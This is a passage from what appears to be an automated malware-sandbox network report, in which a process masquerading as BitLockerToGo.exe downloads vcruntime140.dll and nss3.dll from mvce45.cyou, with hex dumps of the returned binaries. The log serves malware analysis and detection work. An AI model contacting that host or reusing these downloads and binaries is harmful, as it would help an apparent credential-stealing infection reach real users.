                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:53 UTC1390INData Raw: 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  55192.168.2.84983149.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:54 UTC242OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:54 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:54 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                                                                                                                                                                                  Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                                                                                                                                                                                  Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                                                                                                                                                                                  Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                                                  Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  56192.168.2.849833152.195.19.974431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:55 UTC616OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732805314&P2=404&P3=2&P4=ZlQSR0zSHDfjzUqjwz%2fxp3k4u3Td9XB4tbyEB84Gj9VYv7p9STdPutddM%2bTclRAlj3H4KOstpTJClMRVe3fjAQ%3d%3d HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  MS-CV: Jp9nUpfGNJUIQebNJEwkGC
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:56 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  Age: 12127067
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=17280000
                                                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:56 GMT
                                                                                                                                                                                                                                                                                                                  Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                                  MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
                                                                                                                                                                                                                                                                                                                  MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
                                                                                                                                                                                                                                                                                                                  MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
                                                                                                                                                                                                                                                                                                                  Server: ECAcc (nyd/D11E)
                                                                                                                                                                                                                                                                                                                  X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                  X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                                                                                                                                  X-Cache: HIT
                                                                                                                                                                                                                                                                                                                  X-CCC: US
                                                                                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                  X-Powered-By: ARR/3.0
                                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                  Content-Length: 11185
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:56 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  57192.168.2.84983449.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:57 UTC234OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:57 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:57 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:57 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:57 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:57 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                                                                                                                                                                                  Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                                                                                                                                                                                  Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                                                                                                                                                                                  Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                                                                                                                                                                                  Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                                                                                                                                                                                  Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                                                                                                                                                                                  Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                                                                                                                                                                  Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                                                                                                                                                                  Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
